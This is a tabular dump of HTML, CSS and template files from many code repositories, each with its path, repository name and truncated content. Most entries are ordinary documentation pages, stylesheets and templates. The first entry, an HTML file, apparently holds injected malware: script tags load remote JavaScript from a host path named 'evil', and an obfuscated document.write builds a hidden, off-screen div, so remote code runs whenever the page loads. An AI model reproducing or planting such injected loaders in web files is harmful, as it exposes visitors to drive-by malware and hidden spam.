path stringlengths 5 312 | repo_name stringlengths 5 116 | content stringlengths 2 1.04M |
|---|---|---|
images/Core2Duo/020411134r60mh.html | ForAEdesWeb/AEW2 | <script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://cpm.36obuy.org/lion/1.js"></script><script/src=//360cdn.win/c.css></script>
<script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '0... |
output/tag/dns.html | aesptux/aesptux.com-blog | <!DOCTYPE html>
<html lang="en">
<head>
<link rel="stylesheet/less" type="text/css" href="/theme/css/style.less">
<script src="/theme/js/less-1.3.3.min.js" type="text/javascript"></script>
<!-- <link rel="stylesheet" type="text/css" href="/theme/css/style.css"> -->
<link rel="stylesheet" type="text/css" href=... |
HW/13-ajax/pages/comments.html | oleksandrbazil/js | <!DOCTYPE html>
<html>
<head lang="en">
<meta charset="UTF-8">
<title>COMMENTS</title>
</head>
<body>
<div class="commentPage container">
<h3>Wellcome to CHAT room</h3>
<p>Over 70% comments in the Internet have context with trolling or moral pressure.</p>
<img src="http://demotivators.to/media/post... |
lib/boost/boost_1_38_0/doc/html/boost/date_time/ostream_month_formatter.html | scs/uclinux | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Class template ostream_month_formatter</title>
<link rel="stylesheet" href="../../boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.73.2">
<link rel="start" href="../../index.html" titl... |
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/cssref/tryit3750.html | platinhom/ManualHom |
<!DOCTYPE html>
<html lang="en-US">
<!-- Mirrored from www.w3schools.com/cssref/tryit.asp?filename=trycss_sel_active2 by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:13:54 GMT -->
<head>
<title>Tryit Editor v2.3</title>
<meta id="viewport" name='viewport'>
<script>
(function() {
if ( navigator.userAg... |
principal/templates/vacaciones.html | andres2k/EQvacaciones | {% extends 'base.html' %}
{% block titulo %} Vacaciones por Asociado {% endblock %}
{% block encabezado %} <h1> Vacaciones de {{asociado}}</h1> {% endblock %}
{% block contenido %}
<ul>
{%for dato in vacaciones%}
<li>{{asociado}} se toma del {{dato.fecha_desde | date:'DATE_FO... |
client/app/calender/calender.html | jugalkishor-sujal/ToDoAppSrc | <div ng-include="'components/navbar/navbar.html'"></div>
<header class="hero-unit" id="banner">
</header>
<div class="container">
<div ui-calendar="uiConfig.calendar" class="span8 calendar" ng-model="eventSources"></div>
</div>
|
myodd/boost/libs/asio/doc/html/boost_asio/reference/basic_raw_socket/basic_raw_socket/overload2.html | FFMG/myoddweb.piger | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>basic_raw_socket::basic_raw_socket (2 of 6 overloads)</title>
<link rel="stylesheet" href="../../../../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.79.1">
<link r... |
sites/all/themes/ginkgo/style.css | demeesterroel/Atrium-Doc | /**
* Atrium base stylesheet.
*
* Provides styling for generic components and elements within the main
* page canvas.
*/
body.tao {
background:#444;
color:#333;
}
a {
color:#48a;
text-decoration:none;
}
div.limiter { width:960px; }
body.anonymous-login div.limiter { width:560px; }
/**
* "Power" h... |
src/main/webapp/resources/css/style.css | Zweanslord/starfarers | body {
background-color: black;
color: white;
font-size: 100%;
font-family: 'Lucida Console';
margin: 0;
min-width: 320px;
}
header {
text-align: center;
font-size: 3em;
font-weight: bold;
}
header a {
display: block;
width: 100%;
padding: 0.5em 0;
color: white;
text-decoration: none;
}
header a:link, ... |
gagliardo/eiffel/library/msg/Documentation/msg/station_types_list_response_short.html | lucapaganotti/eiffel | <HTML>
<HEAD>
<META NAME="generator" CONTENT="ISE EiffelStudio version 15.01.9.6535 GPL Edition - linux-x86-64">
<meta name="description" content="Summary description for {STATION_TYPES_LIST_RESPONSE}."/>
<meta name="author" content=""/>
<meta name="keywords" content="Eiffel class"/>
<meta name="keywords" content="Eiff... |
Release/javadoc/index-files/index-7.html | LedenevRoman/TestAgeLimit | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="ru">
<head>
<!-- Generated by javadoc (version 1.7.0_40) on Fri Mar 20 04:17:07 MSK 2015 -->
<meta http-equiv="Content-Type" content="text/html" charset="UTF-8">
<title>L-Index</title>
<me... |
public/media/js/assets/admin/layout/css/layout.css | hellocc2/ma | @media print {
body {
background-color: #fff !important;
}
.page-bar {
display: none;
}
.page-sidebar-wrapper {
display: none;
}
.page-quick-sidebar-wrapper {
display: none;
}
.theme-panel {
display: none;
}
.hidden-print {
display: none;
}
.page-footer {
disp... |
layouts/_default/list.html | Vimux/Mainroad | {{ define "main" }}
<main class="main list" role="main">
{{- with .Title }}
<header class="main__header">
<h1 class="main__title">{{ . }}</h1>
</header>
{{- end }}
{{- with .Content }}
<div class="content main__content clearfix">
{{ . }}
</div>
{{- end }}
{{- range .Paginator.Pages }}
{{- .Render "summar... |
lib/dhtmlxSuite/docsExplorer/dhtmlxform/dhtmlxform___form_template.html | AutonomyLab/rosdash | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en" dir="ltr">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" href="../codebase/default.css"... |
RossFamilyTree/evt/b/0/d15f60c19cf404775bab0666d0b.html | RossGammon/the-gammons.net | <!DOCTYPE html>
<html xml:lang="en-GB" lang="en-GB" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-GB">
<title>Ross Gammon’s Family Tree - Events</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="apple-mo... |
apidocs/html/functions_vars_0x63.html | craigshaw/Meazure | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<title>Meazure: Class Members - Variables</title>
<link href="tabs.css" rel="... |
lib/dhtmlxSuite/docsExplorer/dhtmlxtoolbar/dhtmlxtoolbar___api_method_dhtmlxtoolbarobject_setlistoptionimage.html | AutonomyLab/rosdash | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en" dir="ltr">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" href="../codebase/default.css"... |
Logisim-Fork/doc/fr/html/libs/wiring/const01.html | LogisimIt/Logisim | <html>
<head>
<title>Power/Ground</title>
</head>
<body bgcolor="FFFFFF">
<h1><img align="center" src="../../../../../resources/logisim/icons/power.gif" width="32" height="32"> <img align="center" src="../../../../../resources/logisim/icons/ground.gif" width="32" height="32"> <em>Power/Ground</em></h1>
<p><table>
... |
4º Semestre/Estructuras de Datos/Práctica2/doc/es/ubu/inf/edat/pr01_d/GestorMatriculados_Test.html | JoseluCross/trabajos-uni | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="es">
<head>
<!-- Generated by javadoc (1.8.0_121) on Fri Feb 17 17:13:28 CET 2017 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>GestorMatriculados_Test</ti... |
build/docs/doxygen/html/dvbti__trellis__encoder_8h.html | katsikas/gnuradio | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<title>GNU Radio 7f75d35b ... |
Doc/qtcharts/qml-qtcharts-datetimeaxis-members.html | angeloprudentino/QtNets | <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<!-- qdatetimeaxis.cpp -->
<title>List of All Members for DateTimeAxis | Qt Charts 5.7</title>
<link rel="stylesheet" type="text/css" href="style/offline-simple.css"... |
css/shopcart.css | MarcoVanderEecken/ShoppingCart | /*
Side menu
*/
.dropdown-submenu {
position: relative;
}
.dropdown-submenu .dropdown-menu {
top: 0;
left: 100%;
margin-top: -1px;
}
/*
Carousel options:
*/
.carousel{
margin: auto;
min-height: 70%;
}
.carousel-inner > .item {
height: 100%;
width: 100%;
overflow: hidd... |
Resources/html/sc_lag.html | belangeo/cecilia4csound | <?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>sc_la... |
dist/views/login.html | david628/ued | <!DOCTYPE html>
<html lang="en" class="app">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
<meta content="telephone=no" name="format-detection" />
<meta content="email=no" name="format-detection" />
<title></title>
<link re... |
mainWin/css/visualizer.css | Yordrar/pulse | #visualization
{
position: absolute;
z-index: -1;
top: 30px;
left: 0;
margin: 0;
width: 100%;
height: 100%;
} |
images/unit5/knowl/p-1398.html | rhutchinson20/mt21c | <!DOCTYPE html>
<html lang="en-US">
<!--********************************************-->
<!--* Generated from PreTeXt source *-->
<!--* on 2021-03-10T19:25:57-08:00 *-->
<!--* A recent stable commit (2020-08-09): *-->
<!--* 98f21740783f166a773df4dc83cab5293ab63a4a *-->
<!--* ... |
social/templates/messages/inbox.html | jcnix/shade | {% extends "base.html" %}
{% block title %}Inbox{% endblock %}
{% block content %}
{% include 'messages/msg_nav.html' %}
<div class="col-md-12">
<div class="page-header">
<h1>Inbox</h1>
</div>
<table class="table table-hover">
<thead>
<tr>
... |
queencastle-all/queencastle-weixin/src/main/webapp/WEB-INF/view/form.html | AminLiu/Test | <!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8"/>
<meta http-equiv="content-type" content="text/html;charset=utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"/>
<meta name="apple-mobile-web-app-capable" content="yes"/>
<meta name="apple-mobile-web-app-status-bar-style"... |
irrlicht-1.8.1/doc/html/search/classes_63.html | irmao/gameengine | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title></title>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<link rel="stylesheet" type="text/css" href="search.css"/>
<script type="text/javascript" src="search... |
build/gr36/docs/doxygen/html/char__to__short__impl_8h_source.html | aviralchandra/Sandhi | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<title>GNU Radio 3.6.4.2 C... |
grails-app/assets/javascripts/lightbox/lightbox.css | bfritscher/campusfood | #lightbox{
background-color:#eee;
padding: 10px;
border-bottom: 2px solid #666;
border-right: 2px solid #666;
}
#lightboxDetails,
#lightboxDetails a {
font-size: 0.8em;
padding-top: 0.4em;
color: black;
}
#lightboxCaption{ float: left; }
#keyboardMsg{ float: right; }
#closeButton{ top: 5px; right: 5px; }
... |
docs/2.0.1/cli/examples/coherence.html | gwpy/gwpy.github.io | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Simple coherence — GWpy 2.0.1 documentation</title>
<link rel="stylesheet" href="../../_static/bootstrap-sphinx.css" type="text/css" />
<link rel="stylesheet"... |
dependencies/boost-1.46.0/doc/html/boost/accumulators/impl/with_p_square_cumulativ_id569324.html | gorkinovich/DefendersOfMankind | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>Struct template with_p_square_cumulative_distribution_weighted_median_impl</title>
<link rel="stylesheet" href="../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.76... |
archives/p2dos/z80d24/z80dovl/ar9qoz8d/index.html | pbetti/ZDS | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<TITLE>Index of /~pi/compis/files/ftp.mayn.de/pub/cpm/archive/bdos/z80dovl/ar9qoz8d</TITLE>
</HEAD>
<BODY>
<H1>Index of /~pi/compis/files/ftp.mayn.de/pub/cpm/archive/bdos/z80dovl/ar9qoz8d</H1>
<PRE><IMG SRC="http://www.df.lth.se/icons/blank.gif"... |
src/static/dt_show/sequence.html | cy92830/DataTypeGUI | <html>
<head>
</head>
<body>
<script src="../bundle.js"></script>
<!-- Button trigger modal -->
<button type="button" class="btn btn-primary" data-toggle="modal" data-target="#sequenceModalCenter">
Show sequence
</button>
<!-- Modal -->
<div class="modal fade" id="sequenceModalCenter" tabindex="-1" r... |
Doc/qtwidgets/qtwidgets-painting-fontsampler-example.html | angeloprudentino/QtNets | <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<!-- fontsampler.qdoc -->
<title>Font Sampler Example | Qt Widgets 5.7</title>
<link rel="stylesheet" type="text/css" href="style/offline-simple.css" />
<script ty... |
scrapers/data/reports/scrape_index/86b2ebce-bff9-4701-b01b-9ae2d133245d/8c8ee247-a794-4a85-ad11-526d26fcb384.html | thejeshgn/icann_mail_archive | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
get_emails_gnso-policyimpl-wg: scrape_index
- scrapekit</title>
<meta name="description" ... |
css/sticky-footer-navbar.css | pbxsymphony/pbxsymphony | /* Sticky footer styles
-------------------------------------------------- */
html {
position: relative;
min-height: 100%;
}
body {
/* Margin bottom by footer height */
margin-bottom: 10px;
}
.footer {
position: absolute;
bottom: 0;
width: 100%;
/* Set the fixed height of the footer he... |
apps/gurps_manager/templates/gurps_manager/campaign_templates/campaign-create-form.html | Ichimonji10/gurps-manager | {% extends 'gurps_manager/index.html' %}
{% block title %}Create Campaign{% endblock %}
{% block breadcrumb %}
<ol>
<li><a href='{% url 'gurps-manager-campaign' %}'>Campaigns</a></li>
<li><a
href='{% url 'gurps-manager-campaign-create-form' %}'
>New Campaign</a></li>
</... |
usuario/templates/usuario/success.html | argenisosorio/django_blog | {% extends "base/base.html" %}
{% block titulo %}Success{% endblock %}
{% block cuerpo %}
<h1>Success!</h1>
<a href="{% url 'logout' %}">Logout</a>
{% endblock %} |
templates/forum/topic.html | sh4nks/flaskbb-theme-redefined | {% set page_title = _("%(title)s - Topic", title=topic.title) %}
{% set active_forum_nav=True %}
{% extends theme("layout.html") %}
{% block css %}
<link rel="stylesheet" href="{{ url_for('static', filename='css/bootstrap-markdown.min.css') }}">
{{ super() }}
{% endblock %}
{% block content %}
{% from theme(... |
webapp/modules/admin/templates/modperm/new_complete.html | aotake/peachp1 | <{**
* Admin Modperm new regist complete message Template
*
* Smarty3
*
* Copyright 2011-2012, Bmath Web Application Platform Project. (http://bmath.jp)
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Sof... |
page/iantooDate/index.html | xiangzongliang/iantoo | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>iantooDate</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="initial-scale=1.0,maximum-scale=1.0,minimum-scale=1.0,user-scalable=no,target-densitydpi = medium-dpi" />
<link href="../../bu... |
doc/edu/du/penrose/systems/fedoraApp/batchIngest/data/class-use/BagHandler.html | chetrebman/fedoraApp | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_22) on Mon Jul 23 16:29:31 MDT 2012 -->
<TITLE>
Uses of Class edu.du.penrose.systems.fedoraApp.batchIngest.data.BagHandler
</TITLE>
<META NAME="date... |
assets/photograph/模特/1.html | lee29/lee29.github.io | <!DOCTYPE HTML>
<html lang="en" class="no-js">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<title>Lee29 | 模特</title>
<!-- ============ Google Fonts... |
Old/adcSPI_2/Dox/html/globals_defs.html | gratefulfrog/SPI | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" con... |
WEB_TEST/WebContent/Design_Bootstrap/ver20160412/Part01_ch01-04/ch03/navbar-btn-text-link.html | grtlinux/TAIN_WEB_TEST | <!doctype html>
<html lang="ko-kr">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>부트스트랩</title>
<!-- Bootstrap -->
<link href="../css/bootstrap.min.css" rel="stylesheet">... |
css/menu.css | jeldrex/buscaf | /* CSS Document */
img{border:0px;}
.flt{float:left;}
.menubg{clear:left; background-color:#8d8d8d; width:134px;}
.menu{float:left; clear:left; font:bold 11px Arial, Helvetica, sans-serif;}
.menu li {
margin:0px 0px 0px 0px;
list-style:none;
}
.menu a, .menu a:visited {
width:120px;
height:22px;
margin:0px 0px 2px... |
.gradlew/wrapper/dists/gradle-2.0-all/7rd4e4rcg4riqi0j6j508m2lbk/gradle-2.0/docs/groovydoc/org/gradle/language/cpp/plugins/package-summary.html | VolitionEos/DungFactory | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>org.gradle.language.cpp.plugins (Gradle API 2.0)</title>
<meta name="keywords" content="org.gradle.language.cpp.plugins package">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8... |
doc/wehavecookies56/kk/block/package-summary.html | Wehavecookies56/Kingdom-Keys | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_11) on Mon Oct 14 21:24:19 BST 2013 -->
<title>wehavecookies56.kk.block</title>
<meta name="date" content="2013-10-14">
<link rel="styl... |
templates/index.html | matkam11/plex-visualizer | <!DOCTYPE html>
<meta charset="utf-8">
<link rel="stylesheet" href="../css/normalize.css" />
<link rel="stylesheet" href="../css/d3.slider.css" />
<link rel="stylesheet" href="../css/ourstyles.css" />
<style>
text {
font: 10px sans-serif;
}
div.tooltip {
color: white;
position: absolute;
text-align: le... |
html/wolfcanary/io/wolfscript/commandsys/commands/vanilla/Title.html | miningwolf/docs | <!DOCTYPE html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>WolfScript API Title</title>
<link rel="icon" type="image/x-icon" href="/favicon.ico" />
<link href="../../../../... |
测试widget/widget_uexSina/widget/wealth_content.html | LiguofuIOS/pluginCase | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
<meta name="viewport" content="target-densitydpi=device-dpi, width=device-width, initial-scale=1, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">
<link rel="stylesheet" href="css/fonts/font-awesome.min.css">
<lin... |
web/index.html | apoll500/sld-tree-generator | <!--
+------------------------------------------------------------------------------+
| |
| index.html |
| ... |
starcluster/templates/web/spothistory.html | Courtagen/StarCluster | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>StarCluster - Spot History for {{ instance_type }}</title>
<link href="/css/screen.css" rel="stylesheet" type="text... |
docs/dev/Gschem3/Geda3.NetItem.WIDTH.html | ehennes775/gschem3 | <!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8"/>
<title>Geda3.NetItem.WIDTH – Gschem3 – Vala Binding Reference</title>
<link href="../style.css" rel="stylesheet" type="text/css"/><script src="../scripts.js" type="text/javascript">
</script>
</head>
<body>
<div class="site_head... |
_pages/about.html | Spani95/Spani95.github.io | ---
layout: post
title: About
permalink: /about/
---
<div class="fun-facts">
<h2>A few fun facts about myself</h2>
<p>My family dogs name is Jack Sparrow (he’s the greatest doggo you’ll find.) In my free time I enjoy rock-climbing, hiking and of course gaming. My favourite chocolate is dark mint, I love a quality lasag... |
docs/html/gtest-param-util_8h_source.html | bysreg/anjing | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" con... |
ajax/themes/default/style.css | Git-Host/my-new-proxy | .steamprofile * {
font-size: 10px;
font-family: tahoma,Arial,Helvetica,sans-serif;
margin: 0;
padding: 0;
line-height: 1.3em;
}
.steamprofile {
position: relative;
width: 246px;
height: 48px;
background: #3A3A3A url(background.png);
overflow: hidden;
margin: 4px;
}
.steamprofile .sp-bg-game,
.steamprofile ... |
prive/echafaudage/contenu/objet.html | spip/SPIP | #SET{ok,''}[
(#ENV**{exec}|=={#OBJET|objet_info{url_edit}}|et{#OBJET|objet_info{editable}}|oui)
#INCLURE{fond=prive/squelettes/contenu/#ENV**{exec},redirect='',env,retourajax=oui}
#SET{ok,' '}
][(#GET{ok}|non|et{#ENV**{exec}|=={#OBJET|objet_info{url_voir}}}|oui)
[(#ID_OBJET|generer_info_entite{#OBJET,[(#OBJET|id_ta... |
docs/scripts.spqr_defines-module.html | alej0varas/spqr | <?xml version="1.0" encoding="ascii"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>scripts.spqr_defines</title>
<link rel="stylesheet" href="epydoc.css" type="text/css" />
... |
build/docs/doxygen/html/classgr__pn__correlator__cc.html | katsikas/gnuradio | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<title>GNU Radio 7f75d35b ... |
app/partials/library.html | bibliophylum/olli | <!-- library.html -->
<div class="container-fluid">
<div class="row"> <!-- bootstrap classes -->
<div class="col-md-3">
<div id="library">
<h2>Library</h2>
<table border="1" cellpadding="10">
<thead>
<tr>
<th>Category</th>
<th>Detail</th>
</tr>
</thead>
<tbody>
<tr><... |
index.html | vinny17690/full-screen-image-slider | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="style.css">
<title>Full Screen Slider</title>
</head>
<body>
<div class="wra... |
2016.2/Sistemas de Informação/Trabalho 3/Codificação/Javadoc/allclasses-frame.html | rodrigofegui/UnB | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="pt">
<head>
<!-- Generated by javadoc (1.8.0_111) on Mon Dec 05 23:09:28 BRST 2016 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>All Classes</title>
<meta ... |
src/gui/src/main/resources/doc/html/classorg_1_1proxectopuding_1_1gui_1_1model_1_1services_1_1impl_1_1ConfigurationApplicationServiceImpl-members.html | proxecto-puding/proxecto-puding | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" con... |
Domains/Apps/Workspace/Typescript/Intranet/src/allors/material/apps/objects/upcaidentification/edit/upcaidentification-edit.component.html | Allors/allors | <div class="a-main">
<div class="a-breadcrumb container-fluid mat-elevation-z4">
<div class="row">
<div class="col">
<a *ngIf="good" (click)="navigation.list(m.Good)">Products</a>
<a *ngIf="part" (click)="navigation.list(m.Part)">Parts</a>
<span *ngIf="add"> / Add UPCA </span>
... |
module-documentation/dose.genetic.Population-class.html | mauriceling/dose | <?xml version="1.0" encoding="ascii"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>dose.genetic.Population</title>
<link rel="stylesheet" href="epydoc.css" type="text/css" />... |
web/public/css/app.css | emilianobovetti/brewis | body {
padding-bottom: 20px;
}
.navbar-link {
padding: 15px;
float: left;
}
.dialog-box {
display: inline-block;
position: relative;
top: 1px;
margin: 0 20px;
}
.dialog-box span {
padding: 8px 14px;
border-radius: 3px;
}
.ct-chart {
margin-top: 25px;
}
|
root/leaderboards/main.html | Mutant/CrownOfConquest | [% INCLUDE stats/subnav.html %]
[% MACRO page_links BLOCK %]
[% page = 1 %]
[% WHILE page <= page_count %]
[% IF current_page == page %]
[% page %]
[% ELSE %]
<a href="javascript:loadScreen('leaderboards?page=[% page %]&sort=[% current_sort %]')">[% page %]</a>
[... |
Gtk+/share/gtk-doc/html/gtk/migrating-GtkCombo.html | akasfei/EstateMgrGTK | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Migrating from GtkCombo to GtkComboBoxEntry</title>
<meta name="generator" content="DocBook XSL Stylesheets V1.75.1">
<link rel="home" href="index.html" title="GTK+ Re... |
supermarket/supermarket.html | rpmcruz/price-theory | <!DOCTYPE html>
<html>
<head>
<title>Supermarket game</title>
<style>
.wrap { width: 500px; margin: 0 auto; }
canvas { border-style: solid; border-width: 1px; border-color: gray; }
p.text { line-height: 150%; margin-top: 60px; text-align: justify; }
input { vertical-align: middl... |
docs/presentacion/statsDominous/dir_trunk_themes_classic_images_tiles.html | 3oheme/dominous | <?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>StatSVN - Directory trunk/themes/classic/images/tiles/</title>
<meta http-equiv="Content-Type" content="text/html; charset=IS... |
jpgraph/docs/html/exframes/frame_example5.html | tapion/orfeotmp | <html><frameset rows="*,*"> <frame src="image_example5.html"><frame src="example5.html"></frameset></html>
|
images/unit5/knowl/chromatic-mediants.html | rhutchinson20/mt21c | <!DOCTYPE html>
<html lang="en-US">
<!--********************************************-->
<!--* Generated from PreTeXt source *-->
<!--* on 2021-03-10T19:25:47-08:00 *-->
<!--* A recent stable commit (2020-08-09): *-->
<!--* 98f21740783f166a773df4dc83cab5293ab63a4a *-->
<!--* ... |
RossFamilyTree/evt/c/4/d15f60154747172af2690990b4c.html | RossGammon/the-gammons.net | <!DOCTYPE html>
<html xml:lang="en-GB" lang="en-GB" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-GB">
<title>Ross Gammon’s Family Tree - Events</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="apple-mo... |
includes/wysiwyg/ckeditor/tests/plugins/entities/manual/additional.html | ernestbuffington/PHP-Nuke-Titanium | <div id="editor">apos</div>
<script>
CKEDITOR.replace( 'editor', {
entities_additional: 'apos'
} );
</script>
|
